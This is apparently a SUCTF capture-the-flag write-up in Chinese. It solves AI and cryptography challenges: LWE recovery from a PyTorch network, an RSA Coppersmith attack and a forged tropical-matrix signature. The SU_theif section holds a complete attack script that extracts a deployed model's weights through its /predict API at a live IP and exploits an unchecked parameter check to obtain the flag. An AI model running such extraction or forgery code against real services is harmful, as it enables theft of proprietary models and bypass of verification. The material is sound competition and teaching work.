AI

SU_babyAI

It seems like something is missing.

import torch
import torch.nn as nn
import random

FLAG = b"SUCTF{fake_flag_xxx}"
q = 1000000007
n = len(FLAG)
m = 15

class ModuloNet(nn.Module):
    """Bias-free Conv1d followed by a bias-free Linear layer.

    Only the layers are declared here; this listing defines no ``forward``.
    With kernel size 3 and stride 2 the convolution maps ``n_in`` inputs to
    ``(n_in - 3) // 2 + 1`` outputs, which is the input width of ``fc``.

    Args:
        n_in: Length of the 1-D input sequence.
        m_out: Number of outputs of the fully connected layer.
    """

    def __init__(self, n_in, m_out):
        super().__init__()

        self.conv = nn.Conv1d(1, 1, 3, stride=2, bias=False)
        conv_out_size = (n_in - 3) // 2 + 1

        self.fc = nn.Linear(conv_out_size, m_out, bias=False)

def generate_task():
    """Create the challenge instance: save random weights and print noisy outputs.

    The weights are drawn uniformly from ``[0, q)``, stored in ``model.pth``,
    and then the two layers are evaluated by hand with exact Python integers
    on the bytes of ``FLAG``. Each of the ``m`` outputs gets an integer noise
    term in ``[-160, 160]`` added before reduction modulo ``q``.
    """
    model = ModuloNet(n, m)

    with torch.no_grad():
        model.conv.weight.copy_(torch.randint(0, q, model.conv.weight.shape, dtype=torch.float32))
        model.fc.weight.copy_(torch.randint(0, q, model.fc.weight.shape, dtype=torch.float32))

    torch.save(model.state_dict(), "model.pth")

    # Read the weights back from the float32 tensors so that the integers used
    # below are exactly the values a solver gets from model.pth.
    w_conv = model.conv.weight.squeeze().long().tolist()
    w_fc = model.fc.weight.long().tolist()

    x_data = list(FLAG)

    # Kernel-3, stride-2 convolution computed with integer arithmetic.
    conv_out = []
    for i in range((n - 3) // 2 + 1):
        window = x_data[i*2 : i*2+3]
        val = sum(w * x for w, x in zip(w_conv, window))
        conv_out.append(val)

    # Fully connected layer plus small noise, reduced modulo q.
    Y = []
    for i in range(m):
        val = sum(w * x for w, x in zip(w_fc[i], conv_out))
        noise = random.randint(-160, 160)
        Y.append((val + noise) % q)

    print(f"n = {n}")
    print(f"m = {m}")
    print(f"q = {q}")
    print(f"Y = {Y}")


if __name__ == "__main__":
    generate_task()

'''
n = 41
m = 15
q = 1000000007
Y = [776038603, 454677179, 277026269, 279042526, 78728856, 784454706, 29243312, 291698200, 137468500, 236943731, 733036662, 421311403, 340527174, 804823668, 379367062]
'''

在深度学习中,如果没有类似 ReLU、Sigmoid 这样的非线性激活函数,并且 bias=False,那么无论叠加多少层卷积层 (Conv1d) 或全连接层 (Linear),其正向传播的本质都可以完全坍缩、折叠成一次普通的矩阵乘法。我们可以将这两层网络等效为一个二维系数矩阵 $M_{15 \times 41}$。

对于输入列向量 $X$(即 Flag 的 ASCII 码),网络的前向传播等价于:$$ Output = M \times X $$

观察源码最后的输出处理:

noise = random.randint(-160, 160)
Y.append((val + noise) % q)

每次输出都加上了 $[-160, 160]$ 范围的小噪音,并对大素数 $q = 1000000007$ 取模,得到最终的数组 $Y_{15}$,也就是一个 LWE 问题:

$$Y \equiv M \times X + E \pmod q$$

$M$ 是我们通过网络权重推导出的 $15 \times 41$ 等效系数矩阵
$X$ 是 41 个字符的 FLAG。已知 SUCTF{},实际未知数为 34 个。
$E$ 是范围在 $[-160, 160]$ 之间的噪音向量

剔除噪音 $E$,需要利用 Kannan 嵌入法 (Kannan's Embedding) 将 LWE 转化为最近向量问题 (CVP) 构建晶格,并通过 LLL 算法寻找最短向量(SVP)

为了确保 LLL 算法 100% 收敛找到最短向量,必须运用两个关键的格优化技巧:
中心平移 (Center Shift):将未知数 $X$ 从 $[32, 126]$ 平移到 $[-47, 47]$(减去 ASCII 中心值 79),极大降低目标向量的范数

方差配平 (Weight Balancing):平移后的未知数最大约 47,而噪音最大为 160。我们在对角矩阵中将未知数权重放大 3 倍($3 \times 47 \approx 141$),使其在格中的地位(方差)与噪音相近。

提取网络权重:

import torch
import torch.nn as nn
import json

class ModuloNet(nn.Module):
    """Layer skeleton matching the challenge network, used only to load its state dict.

    Args:
        n_in: Length of the 1-D input sequence.
        m_out: Number of outputs of the fully connected layer.
    """

    def __init__(self, n_in, m_out):
        super().__init__()
        self.conv = nn.Conv1d(1, 1, 3, stride=2, bias=False)
        # A kernel-3, stride-2 convolution yields (n_in - 3) // 2 + 1 values.
        self.fc = nn.Linear((n_in - 3) // 2 + 1, m_out, bias=False)

# Rebuild the architecture and load the published weights. weights_only=True
# restricts unpickling to tensors, matching how the other listings in this
# file call torch.load.
model = ModuloNet(41, 15)
model.load_state_dict(torch.load("model.pth", map_location="cpu", weights_only=True))

# Dump the weights as plain integers so the lattice step can run without torch.
with open("weights.json", "w") as f:
    json.dump({"w_conv": model.conv.weight.squeeze().long().tolist(),
               "w_fc": model.fc.weight.long().tolist()}, f)
print("[+] 权重已成功导出至 weights.json")
# sage
import json
from sage.all import matrix, ZZ

with open("weights.json", "r") as f:
    data = json.load(f)
w_conv, w_fc = data["w_conv"], data["w_fc"]

n, m, q = 41, 15, 1000000007
Y = [776038603, 454677179, 277026269, 279042526, 78728856, 784454706, 29243312,
     291698200, 137468500, 236943731, 733036662, 421311403, 340527174, 804823668, 379367062]

# 1. Flatten the two linear layers into a single m x n matrix M (mod q).
#    Convolution output j reads inputs 2j, 2j+1 and 2j+2.
M = [[0] * n for _ in range(m)]
for i in range(m):
    for j in range((n - 3) // 2 + 1):
        coef = w_fc[i][j]
        M[i][j*2] = (M[i][j*2] + coef * w_conv[0]) % q
        M[i][j*2+1] = (M[i][j*2+1] + coef * w_conv[1]) % q
        M[i][j*2+2] = (M[i][j*2+2] + coef * w_conv[2]) % q

# 2. Remove the known flag bytes and centre the unknown ones.
prefix, suffix = b"SUCTF{", b"}"
known_idx = list(range(len(prefix))) + [n - 1]
unk_idx = [i for i in range(n) if i not in known_idx]
U = len(unk_idx)

flag_known = [0] * n
for k in range(len(prefix)):
    flag_known[k] = prefix[k]
flag_known[-1] = suffix[0]

SHIFT = 79  # centre of the printable ASCII range [32, 126]

# target[i] = Y[i] minus the contribution of the known bytes and of the
# constant SHIFT at every unknown position, so that
# target = M_unk * (x - SHIFT) + noise (mod q).
target = [0] * m
for i in range(m):
    known_sum = sum(M[i][k] * flag_known[k] for k in known_idx)
    shift_sum = sum(M[i][k] * SHIFT for k in unk_idx)
    target[i] = (Y[i] - known_sum - shift_sum) % q

# 3. Kannan embedding.
W_x = 3    # scale for the unknowns (3 * 47 is about 141)
W_t = 160  # marker for the embedded target row (matches the noise bound)
dim = U + m + 1
B = matrix(ZZ, dim, dim)

for i in range(U):
    B[i, i] = W_x
    for j in range(m):
        B[i, U + j] = M[j][unk_idx[i]]
for j in range(m):
    B[U + j, U + j] = q
for j in range(m):
    B[-1, U + j] = -target[j]
B[-1, -1] = W_t

# 4. LLL reduction; the wanted row is (W_x * (x - SHIFT), -noise, +/-W_t).
print("[*] 正在执行 LLL 格基约化...")
B_red = B.LLL()

for row in B_red:
    if abs(row[-1]) != W_t:
        continue
    sign = 1 if row[-1] == W_t else -1
    scaled = [row[i] * sign for i in range(U)]
    # Explicit checks instead of assert, so the filter also works under -O.
    if any(val % W_x != 0 for val in scaled):
        continue
    codes = [(val // W_x) + SHIFT for val in scaled]
    if not all(32 <= code <= 126 for code in codes):
        continue
    flag_chars = [chr(code) for code in codes]
    print("\n[🎉] 完美剥离噪音,成功解出 FLAG: ")
    print("SUCTF{" + "".join(flag_chars) + "}")
    break
else:
    # No row of the reduced basis passed every check.
    print("[-] 未能找到符合条件的短向量。")
# SUCTF{PyT0rch_m0del_c4n_h1d3_LWE_pr0bl3m}

SU_theif

老师布置了一道课后作业,小S很早就写完了并且部署好了,小U很懒惰,不想写想直接抄小S的,但是小S不让,所以请你帮帮他,注意了这件事情不合规所以不要和任何人说

from flask import Flask, request, jsonify, render_template
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from torch.utils.data import DataLoader, Subset, Dataset
import base64
import io
import numpy as np
import os
app = Flask(__name__)

class Net(nn.Module):
    """Two small convolutions followed by a 256 -> 256 linear layer.

    The layers are created in the order linear, conv, conv1. That is also the
    order in which ``parameters()`` yields them, so it is kept unchanged.
    """

    def __init__(self):
        super(Net, self).__init__()
        self.linear = nn.Linear(256, 256)
        self.conv=nn.Conv2d(1, 1, (3, 3), stride=1)

        self.conv1=nn.Conv2d(1, 1, (2, 2), stride=2)

    def forward(self, x):
        """Pad two zeros on the left and top, apply both convolutions, flatten, apply the linear layer."""
        x = nn.functional.pad(x, (2, 0, 2, 0), mode='constant', value=0)
        x = self.conv(x)
        x = self.conv1(x)
        x = x.view(-1)
        x = self.linear(x)
        return x

# Use the GPU when torch reports one, otherwise the CPU.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Reference model whose parameters the /flag endpoint compares against.
model = Net().to(device)
model.load_state_dict(torch.load('/app/model.pth', weights_only=True, map_location=device))

# Scratch model that /flag loads each submitted state dict into.
user_model = Net().to(device)

@app.route('/')
def index():
    """Serve the landing page template."""
    return render_template('index.html')

@app.route('/predict', methods=['POST'])
def predict():
    """Run the reference model on the JSON field ``image`` and return its output.

    Returns:
        ``{'prediction': [...]}`` on success, ``{'error': ...}`` with status
        400 when ``image`` is missing, or with status 500 when building the
        tensor or evaluating the model raises.
    """
    if 'image' not in request.json:
        return jsonify({'error': '没有提供图像'}), 400

    try:
        image_data = request.json['image']
        tensor_back = torch.tensor(image_data).to(device)

        with torch.no_grad():
            outputs = model(tensor_back)

        return jsonify({'prediction': outputs.tolist()})

    except Exception as e:
        return jsonify({'error': str(e)}), 500

@app.route('/flag', methods=['POST'])
def flag():
    """Return the flag when the uploaded state dict is close to the reference model.

    The JSON field ``model`` holds a base64-encoded state dict. Parameters are
    compared pairwise: 2-D tensors must match within ``threshold_weight`` and
    1-D tensors within ``threshold_bias``. Tensors of any other rank (the 4-D
    convolution kernels) match neither branch and are therefore not compared.

    Returns:
        ``{'flag': ...}`` on success, ``{'error': ...}`` with status 400 for a
        missing field or a mismatching layer, or with status 500 when decoding
        or loading the model raises.
    """
    if 'model' not in request.json:
        return jsonify({'error': '没有提供模型文件'}), 400

    try:
        model_data = base64.b64decode(request.json['model'])
        model_file = io.BytesIO(model_data)
        user_model.load_state_dict(torch.load(model_file, weights_only=True, map_location=device))

        threshold_weight = 0.0005
        threshold_bias = 0.005

        for i, (param, user_param) in enumerate(zip(model.parameters(), user_model.parameters())):
            # ~(diff <= t) rather than (diff > t): a NaN difference also counts as a mismatch.
            if param.dim() == 2:
                if torch.any(~(abs(param - user_param) <= threshold_weight)):
                    return jsonify({'error': f'Layer weight difference too large at layer {i}'}), 400
            elif param.dim() == 1:
                if torch.any(~(abs(param - user_param) <= threshold_bias)):
                    return jsonify({'error': f'Layer bias difference too large at layer {i}'}), 400

        with open('/app/flag', 'r') as f:
            flag = f.read()
        return jsonify({'flag': f'Here is your flag: {flag}'})

    except Exception as e:
        return jsonify({'error': str(e)}), 500


if __name__ == '__main__':
    app.run(host="0.0.0.0", port=8080)

关键漏洞在:

  • 服务端只校验了 2 维参数和 1 维参数(也就是 linear.weight 和各 bias)
  • 4 维卷积权重完全没有被检查(conv.weight、conv1.weight)

直接提交 model_base.pth 会失败,报第 0 层(linear.weight)差异过大。所以正确做法是:

  1. 保留 base 模型的卷积层
  2. 调用 /predict 收集随机输入 x 与输出 y
  3. 用 base 卷积层把 x 映射成特征 z
  4. 通过最小二乘一次性解出线性层参数:y ≈ Wz + b
  5. 把求得的 W、b 写回模型后提交 /flag
import argparse
import base64
import io
import time

import requests
import torch
import torch.nn as nn


class Net(nn.Module):
    """Local copy of the server network: two convolutions and a 256 -> 256 linear layer.

    The layer creation order (linear, conv, conv1) mirrors the server listing.
    """

    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(256, 256)
        self.conv = nn.Conv2d(1, 1, (3, 3), stride=1)
        self.conv1 = nn.Conv2d(1, 1, (2, 2), stride=2)

    def forward(self, x):
        """Pad two zeros on the left and top, apply both convolutions, flatten, apply the linear layer."""
        x = nn.functional.pad(x, (2, 0, 2, 0), mode="constant", value=0)
        x = self.conv(x)
        x = self.conv1(x)
        x = x.view(-1)
        x = self.linear(x)
        return x


def query_predict(session, base_url, x, retries=8, initial_wait=0.2):
    """POST ``x`` to ``/predict`` and return the prediction as a float32 tensor.

    Args:
        session: Object with a ``requests.Session``-style ``post`` method.
        base_url: Challenge base URL without a trailing slash.
        x: Input tensor; it is sent as a nested list.
        retries: Maximum number of attempts.
        initial_wait: Seconds to wait after the first failed attempt; the wait
            grows by a factor of 1.5 after every further failure.

    Returns:
        The prediction tensor, or ``None`` when every attempt failed.
    """
    payload = {"image": x.tolist()}
    wait = initial_wait

    for attempt in range(retries):
        try:
            response = session.post(
                base_url + "/predict", json=payload, timeout=20)
            if response.status_code == 200:
                data = response.json()
                if "prediction" in data:
                    return torch.tensor(data["prediction"], dtype=torch.float32)
        except (requests.RequestException, ValueError):
            # Network failures and undecodable bodies are treated alike: retry.
            pass

        # Back off only when another attempt follows.
        if attempt + 1 < retries:
            time.sleep(wait)
            wait *= 1.5

    return None


def submit_model(session, base_url, model):
    """Serialize ``model.state_dict()`` and POST it, base64-encoded, to ``/flag``.

    Args:
        session: Object with a ``requests.Session``-style ``post`` method.
        base_url: Challenge base URL without a trailing slash.
        model: Module whose state dict is uploaded.

    Returns:
        Tuple ``(status_code, response_text)``.
    """
    model_buffer = io.BytesIO()
    torch.save(model.state_dict(), model_buffer)
    model_b64 = base64.b64encode(model_buffer.getvalue()).decode()

    response = session.post(
        base_url + "/flag", json={"model": model_b64}, timeout=30)
    return response.status_code, response.text


def main():
    """Recover the server's linear layer by least squares and submit the rebuilt model.

    The convolution layers come from the local ``model_base.pth``. For each
    random input the local convolutions give the feature vector ``z`` and the
    server's ``/predict`` gives ``y``; solving ``y = W z + b`` over all samples
    yields the linear layer's weight and bias.
    """
    parser = argparse.ArgumentParser(description="SU_theif solver")
    parser.add_argument(
        "--url", default="http://1.95.113.59:10003", help="Challenge base URL")
    parser.add_argument("--samples", type=int, default=700,
                        help="Number of queries for least squares")
    parser.add_argument("--seed", type=int, default=0, help="Random seed")
    args = parser.parse_args()

    torch.manual_seed(args.seed)

    model = Net()
    base_state = torch.load(
        "model_base.pth", map_location="cpu", weights_only=True)
    model.load_state_dict(base_state)

    session = requests.Session()

    x_rows = []
    y_rows = []

    print(f"[+] Collecting {args.samples} samples from {args.url}")
    attempts = 0
    max_attempts = args.samples * 20

    while len(x_rows) < args.samples and attempts < max_attempts:
        attempts += 1
        x = torch.randn(1, 1, 32, 32)

        # Features that feed the linear layer, computed with the local convolutions.
        with torch.no_grad():
            z = nn.functional.pad(x, (2, 0, 2, 0), mode="constant", value=0)
            z = model.conv(z)
            z = model.conv1(z)
            z = z.view(-1)

        y = query_predict(session, args.url, x)
        if y is None:
            continue

        # The appended constant 1 makes the last solution row the bias.
        x_rows.append(torch.cat([z, torch.ones(1)], dim=0))
        y_rows.append(y)

        if len(x_rows) % 100 == 0:
            print(
                f"    collected: {len(x_rows)}/{args.samples} (attempts={attempts})")

    if len(x_rows) < args.samples:
        print(
            f"[-] Failed to collect enough samples: {len(x_rows)}/{args.samples}")
        return

    print("[+] Solving linear parameters with least squares")
    x_matrix = torch.stack(x_rows)  # (N, 257)
    y_matrix = torch.stack(y_rows)  # (N, 256)

    solution = torch.linalg.lstsq(x_matrix, y_matrix).solution  # (257, 256)
    recovered_w = solution[:256, :].T.contiguous()  # (256, 256)
    recovered_b = solution[256, :].contiguous()  # (256,)

    with torch.no_grad():
        model.linear.weight.copy_(recovered_w)
        model.linear.bias.copy_(recovered_b)

    print("[+] Submitting recovered model")
    status_code, body = submit_model(session, args.url, model)
    print(status_code)
    print(body)


if __name__ == "__main__":
    main()
# SUCTF{n0t_4ll_h1st0ry_t3lls_th3_truth_6a4e2b8d}

Crypto

SU_RSA

This is an RSA challenge

from Crypto.Util.number import *
# Challenge generator: RSA with a small private exponent and a leak of the
# high bits of p + q.
flag = b'******'
m = bytes_to_long(flag)
bits = 1024
# delta is not referenced anywhere else in this listing.
delta = 0.08
gamma = 0.39
delta0 = 0.33

p = getPrime(bits // 2)
q = getPrime(bits // 2)
N = p * q
# d is a prime of int(bits * delta0) = 337 bits; e is its inverse modulo phi.
d = getPrime(int(bits*delta0))
phi = (p-1)*(q-1)
e = inverse(d,phi)
# S is p + q with its low int(bits * gamma) = 399 bits cleared.
S = p + q - (p + q) % (2**int(bits * gamma))
c = pow(m,e,N)

print("N =",N)
print("e =",e)
print("c =",c)
print("S =",S)

"""
N = 92365041570462372694496496651667282908316053786471083312533551094859358939662811192309357413068144836081960414672809769129814451275108424713386238306177182140825824252259184919841474891970355752207481543452578432953022195722010812705782306205731767157651271014273754883051030386962308159187190936437331002989
e = 11633089755359155730032854124284730740460545725089199775211869030086463048569466235700655506823303064222805939489197357035944885122664953614035988089509444102297006881388753631007277010431324677648173190960390699105090653811124088765949042560547808833065231166764686483281256406724066581962151811900972309623
c = 49076508879433623834318443639845805924702010367241415781597554940403049101497178045621761451552507006243991929325463399667338925714447188113564536460416310188762062899293650186455723696904179965363708611266517356567118662976228548528309585295570466538477670197066337800061504038617109642090869630694149973251
S = 19240297841264250428793286039359194954582584333143975177275208231751442091402057804865382456405620130960721382582620473853285822817245042321797974264381440
"""

p+q高位泄露

$$p + q = S + x_0$$
$$e \cdot d = k \cdot \phi(N) + 1$$
$$\phi(N) = N - (p+q) + 1 = N - S - x_0 + 1$$
$$A = N - S + 1$$
$$e \cdot d = k \cdot (A - x_0) + 1$$
$$k \cdot (A - x_0) + 1 \equiv 0 \pmod e$$
$$f(k, x_0) = k \cdot (A - x_0) + 1 \equiv 0 \pmod e$$

k 的大小近似等于 d,直接跑二元 copper 的板子出不来。因为 e 不是素数,所以 Zmod(e) 存在零因子,它不是一个整环,简单修复一下代码

# sage
from sage.all import *
from Crypto.Util.number import *
import itertools

def small_roots(f, bounds, m=1, d=None):
    """Find small roots of a multivariate polynomial modulo N (Coppersmith-style).

    Args:
        f: Polynomial over ``Zmod(N)``.
        bounds: One upper bound per variable on the absolute size of the root.
        m: Highest power of ``f`` used when building the shift polynomials.
        d: Each variable is shifted by exponents ``0 .. d-1``; defaults to
            ``f.degree()``.

    Returns:
        List of root tuples (elements of the base ring of ``f``), or ``[]``
        when no zero-dimensional ideal is found.
    """
    if not d:
        d = f.degree()

    R = f.base_ring()
    N = R.cardinality()

    # Make f monic by multiplying with the modular inverse of its leading
    # coefficient instead of dividing inside Zmod(N), which is not an
    # integral domain when N is composite. Then lift to ZZ.
    lm = f.monomials()[0]
    lc = f.monomial_coefficient(lm)
    inv_lc = inverse(lc, N)
    f = f * inv_lc
    f = f.change_ring(ZZ)

    # Shift polynomials N^(m-i) * f^i * (monomial shifts).
    G = Sequence([], f.parent())
    for i in range(m + 1):
        base = N ^ (m - i) * f ^ i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)

    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)

    # Scale each column by its monomial evaluated at the bounds before LLL ...
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)

    B = B.dense_matrix().LLL()

    # ... and undo the scaling afterwards.
    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1 / factor)

    # Add reduced polynomials one at a time until the ideal has dimension 0.
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B * monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            # The new polynomial made the system inconsistent; drop it.
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots

    return []

N = 92365041570462372694496496651667282908316053786471083312533551094859358939662811192309357413068144836081960414672809769129814451275108424713386238306177182140825824252259184919841474891970355752207481543452578432953022195722010812705782306205731767157651271014273754883051030386962308159187190936437331002989
e = 11633089755359155730032854124284730740460545725089199775211869030086463048569466235700655506823303064222805939489197357035944885122664953614035988089509444102297006881388753631007277010431324677648173190960390699105090653811124088765949042560547808833065231166764686483281256406724066581962151811900972309623
c = 49076508879433623834318443639845805924702010367241415781597554940403049101497178045621761451552507006243991929325463399667338925714447188113564536460416310188762062899293650186455723696904179965363708611266517356567118662976228548528309585295570466538477670197066337800061504038617109642090869630694149973251
S = 19240297841264250428793286039359194954582584333143975177275208231751442091402057804865382456405620130960721382582620473853285822817245042321797974264381440
A = N - S + 1

# f(k, x) = k * (A - x) + 1 vanishes modulo e at (k, x0), where p + q = S + x0.
PR.<k, x> = PolynomialRing(Zmod(e))
f = k * (A - x) + 1
res = small_roots(f, (2^340, 2^400), m = 3, d = 4)
if not res:
    raise ValueError("small_roots returned no root; try larger m or d")
# The original listing indexed an undefined name `root`; use the first root found.
root = res[0]
k = int(root[0])
x = int(root[1])
phi = N - (S + x) + 1
d = inverse(e, phi)
flag = long_to_bytes(pow(c,d,N)).decode()
print(flag)
# SUCTF{congratulation_you_know_small_d_with_hint_factor}

SU_Restaurant

Well, aren’t there a bit too many cryptography challenges here?

from Crypto.Util.number import *
from Crypto.Util.Padding import *
from random import randint, choice, choices
from hashlib import sha3_512
from base64 import b64encode, b64decode
from secret import flag
import numpy as np
import json
import os
# import pty

# H(x): SHA3-512 of the bytes x, returned as a list of 64 integers (one per
# pair of hex digits of the digest).
H = lambda x: [int(y, 16) for y in [sha3_512(x).hexdigest()[i:i+2] for i in range(0, 128, 2)]]
# The characters with code points 33..126, used for the random dish name.
alphabet = "".join([chr(i) for i in range(33, 127)])

class Point:
    """Integer wrapper with min-plus (tropical) arithmetic.

    ``a + b`` is ``min(a, b)`` and ``a * b`` is ordinary integer addition.
    Adding a plain ``int`` returns the ordinary integer sum instead.
    """

    def __init__(self, x):
        if isinstance(x, float):
            raise ValueError("...")
        # Unwrap nested Point objects until a plain int is reached.
        while not isinstance(x, int):
            x = x.x
        self.x = x

    def __add__(self, other):
        if isinstance(other, int):
            return self.x + other
        return Point(min(self.x, other.x))

    def __radd__(self, other):
        if isinstance(other, int):
            return self.x + other
        return Point(min(self.x, other.x))

    def __mul__(self, other):
        return Point(self.x + other.x)

    def __eq__(self, other):
        return self.x == other.x

    def __repr__(self):
        return f"{self.x}"

    def __int__(self):
        return self.x


class Block:
    """n-by-m matrix of Point entries with min-plus matrix arithmetic.

    Args:
        n: Number of rows.
        m: Number of columns.
        data: Optional nested sequence of entries. When omitted (or falsy)
            the entries are drawn uniformly from 0..255.

    Raises:
        ValueError: If ``data`` is given with a shape other than n-by-m.
    """

    def __init__(self, n, m, data=None):
        self.n = n
        self.m = m
        if data and (len(data) != n or len(data[0]) != m):
            raise ValueError("...")
        if data:
            # NOTE(review): this tests the container itself, not its entries;
            # Point() unwraps nested Points, so both branches seem to give the
            # same result - confirm before simplifying.
            if isinstance(data, Point):
                self.data = [[Point(data[i][j].x) for j in range(m)] for i in range(n)]
            else:
                self.data = [[Point(data[i][j]) for j in range(m)] for i in range(n)]
        else:
            self.data = [[Point(randint(0, 255)) for _ in range(m)] for _ in range(n)]

    def __add__(self, other):
        """Entry-wise Point addition, i.e. the entry-wise minimum."""
        return Block(self.n, self.m, [[self.data[i][j] + other.data[i][j] for j in range(self.m)] for i in range(self.n)])

    def __mul__(self, other):
        """Min-plus matrix product; every entry starts at 511, which caps the result."""
        assert self.m == other.n, "😭"
        res = [[Point(511) for _ in range(other.m)] for _ in range(self.n)]
        for i in range(self.n):
            for j in range(other.m):
                for k in range(self.m):
                    res[i][j] = res[i][j] + (self.data[i][k] * other.data[k][j])

        return Block(self.n, other.m, res)

    def __eq__(self, other):
        res = True
        for i in range(self.n):
            for j in range(self.m):
                res = res and self.data[i][j] == other.data[i][j]
        return res

    def __getitem__(self, item):
        return self.data[item]

    def __repr__(self):
        return f"{self.data}"

    def legitimacy(self, lb, rb):
        """Return True when every entry lies in the closed interval [lb, rb]."""
        for i in range(self.n):
            for j in range(self.m):
                if not (lb <= int(self.data[i][j].x) <= rb):
                    return False
        return True

class Restaurant:
    """Signature scheme over min-plus matrices.

    ``chef`` (m x k) and ``cooker`` (k x n) are random; ``fork`` is their product.
    """

    def __init__(self, m, n, k):
        self.m, self.n, self.k = m, n, k
        self.chef = Block(m, k)
        self.cooker = Block(k, n)
        self.fork = self.chef * self.cooker

    def cook(self, msg):
        """Sign ``msg`` and return the five matrices ``(A, B, P, R, S)``.

        Fresh random ``U`` and ``V`` are drawn until ``A != U`` and ``B != V``.
        """
        if isinstance(msg, str):
            msg = msg.encode()
        tmp = H(msg)
        M = Block(self.n, self.m, [[tmp[i * self.m + j] for j in range(self.m)] for i in range(self.n)])
        while True:
            U = Block(self.n, self.k)
            V = Block(self.k, self.m)
            P = self.chef * V
            R = U * self.cooker
            S = U * V
            A = (M * self.chef) + U
            B = (self.cooker * M) + V
            if A != U and B != V:
                break
        return A, B, P, R, S

    def eat(self, msg, A, B, P, R, S):
        """Verify a signature.

        Accepts when ``A * B`` equals ``M*fork*M + M*P + R*M + S``, differs
        from ``S``, and every entry of the five matrices lies in 0..256.
        """
        if isinstance(msg, str):
            msg = msg.encode()
        tmp = H(msg)
        M = Block(self.n, self.m, [[tmp[i * self.m + j] for j in range(self.m)] for i in range(self.n)])
        Z = (M * self.fork * M) + (M * P) + (R * M) + S
        W = A * B
        legal = A.legitimacy(0, 256) and B.legitimacy(0, 256) and P.legitimacy(0, 256) and R.legitimacy(0, 256) and S.legitimacy(0, 256)
        return W == Z and W != S and legal


banner = """=================================================================
____ _ _ ____ _ _
/ ___|| | | | | _ \ ___ ___| |_ __ _ _ _ _ __ __ _ _ __ | |_
\___ \| | | | | |_) / _ \/ __| __/ _` | | | | '__/ _` | '_ \| __|
___) | |_| | | _ < __/\__ \ || (_| | |_| | | | (_| | | | | |_
|____/ \___/ |_| \_\___||___/\__\__,_|\__,_|_| \__,_|_| |_|\__|
=================================================================
"""

menu = """Do something...
[1] Say to the waiter: "Please give me some food."
[2] Say to the waiter: "Please give me the FLAG!"
[3] Check out
What do you want to do?
>>> """

foodlist = ["Spring rolls", "Red Rice Rolls", "Chencun Rice Noodles", "Egg Tart", "Cha siu bao"]
table = []

# Interactive menu loop of the challenge server.
# NOTE(review): the indentation of this listing was lost, so the nesting of
# some statements (notably the exit(0) after the flag check) cannot be
# recovered from the text; the code is left exactly as published.
def main():
print(banner)
SU_Restaurant = Restaurant(8, 8, 7)

# havefork is assigned but never read in this listing.
havefork = False
try:
while True:
op = int(input(menu))
if op == 1:
# Option 1: hand out a signature for a dish from foodlist, at most two
# distinct dishes in total.
if len(table) == 2:
print("You're full and don't want to order more...")
continue
foodname = choice(foodlist)
while foodname in table:
foodname = choice(foodlist)
print(f'The waiter says: "Here is your {foodname}!"')
table.append(foodname)
A, B, P, R, S = SU_Restaurant.cook(foodname)
print(f'A = {A}\nB = {B}\nP = {P}\nR = {R}\nS = {S}')

elif op == 2:
# Option 2: the client must sign a random 36-character dish name.
Fo0dN4mE = "".join(choices(alphabet, k=36))
print(f'The waiter says: "Please make {Fo0dN4mE} for me!"')
res = json.loads(input(">>> "))
# Ordinary (numpy) matrix ranks of the submitted matrices.
r1 = np.linalg.matrix_rank(np.array(res["A"]))
r2 = np.linalg.matrix_rank(np.array(res["B"]))
r3 = np.linalg.matrix_rank(np.array(res["P"]))
r4 = np.linalg.matrix_rank(np.array(res["R"]))
r5 = np.linalg.matrix_rank(np.array(res["S"]))

# A and B need rank at least 7; P, R and S need rank 8.
if r1 < 7 or r2 < 7 or r3 < 8 or r4 < 8 or r5 < 8:
print('The waiter says: "These are illegal food ingredients"')
continue

A = Block(8, 7, res["A"])
B = Block(7, 8, res["B"])
P = Block(8, 8, res["P"])
R = Block(8, 8, res["R"])
S = Block(8, 8, res["S"])
if SU_Restaurant.eat(Fo0dN4mE, A, B, P, R, S):
print(f'The waiter says: "Here is the FLAG: {flag}"')
else:
print('The waiter says: "This is not what I wanted!"')
exit(0)

elif op == 3:
print('The waiter says: "Welcome to our restaurant next time!"')
break
else:
print("Invalid option!")
# A bare except also catches the SystemExit raised by exit(0) inside the try
# block, so "Something wrong..." is printed on that path as well.
except:
print("Something wrong...")
exit(0)

if __name__ == "__main__":
main()

题目实现了一个类似于热带半环数字签名的协议,但我们可以通过巧妙构造矩阵,在完全不知道密钥(即代码中的 fork 或 F)的情况下伪造合法的签名

在代码自定义的 Point 和 Block 类中,重载了加法和乘法:
加法 (+):取两个数的最小值 $\min(x, y)$
乘法 (*):取两个数的一般加法 $x + y$

在验证逻辑 eat() 中,服务器要求我们提供 $A, B, P, R, S$ 五个矩阵,使得:$$W = A \times B = M \times F \times M + M \times P + R \times M + S = Z$$且满足 $W \neq S$ 以及所有矩阵为满秩(常规线性代数意义下的秩)。因为加法是取最小值,上述等式可以转换为标准数学表达:$$Z_{i,j} = \min(MFM_{i,j}, MP_{i,j}, RM_{i,j}, S_{i,j})$$漏洞点:虽然我们不知道 $F$,但我们可以通过控制 $W$ 和其余矩阵,让 $Z$ 的最小值完全不依赖于 $MFM$。由于 $MFM_{i,j} = \min_{k,l} (M_{i,k} + F_{k,l} + M_{l,j})$,且 $F \ge 0$,因此我们有一个硬性下界:$$MFM_{i,j} \ge \min_k M_{i,k} + \min_l M_{l,j}$$只要我们构造的 $W_{i,j} = \min_k M_{i,k} + \min_l M_{l,j}$,就能保证 $W \le MFM$ 永远成立。此时,只要让 $MP$、$RM$ 与 $S$ 的逐项最小值等于 $W$,就能在不知道 $F$ 的情况下完美控制 $Z$。

